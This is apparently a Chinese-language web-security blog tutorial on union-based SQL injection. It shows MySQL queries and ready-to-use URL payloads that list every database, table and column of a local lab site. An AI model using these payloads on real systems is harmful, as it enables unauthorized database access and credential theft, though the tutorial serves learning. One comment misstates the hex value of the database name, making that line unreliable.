/*
转载请注明出处,By:珍惜少年时
小知识,只是放在博客吃饭时无聊看看,大牛勿喷。
*/
珍惜少年时博客,专注网络安全 web渗透测试
00x1爆所有库:
mysql> select schema_name from information_schema.schemata; +--------------------+ | schema_name | +--------------------+ | information_schema | | challenges | | dvwa | | mysql | | performance_schema | | phpcmsv9 | | security | | sqlinject | | test | | test_sqlinjection | +--------------------+ 10 rows in set (0.00 sec)
#该命令等价于show databases;
#所以sql语句为:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(schema_name) from information_schema.schemata--
00x2爆所有表:
mysql> select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374; +--------------------------+ | group_concat(table_name) | +--------------------------+ | admin,user,user_a | +--------------------------+ 1 row in set (0.00 sec)
#注:
0x91916c696E6a656374为sqlinject库的16进制
#该命令等价于show tables;当然了,是在选择了数据库的情况下,也就是where哪里使用hex选择了的。
#所以sql语句为:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374--
#可将其缩句为:select table_name from information_schema.tables
该sql语句可不选择数据库,直接爆所有的表。“列名”亦是如此。
00x3爆所有列:
mysql> select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374; +----------------------------------------------------------------+ | group_concat(column_name) | +----------------------------------------------------------------+ | id,username,password,id,username,password,id,username,password | +----------------------------------------------------------------+ 1 row in set (0.03 sec)
故语句为:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374--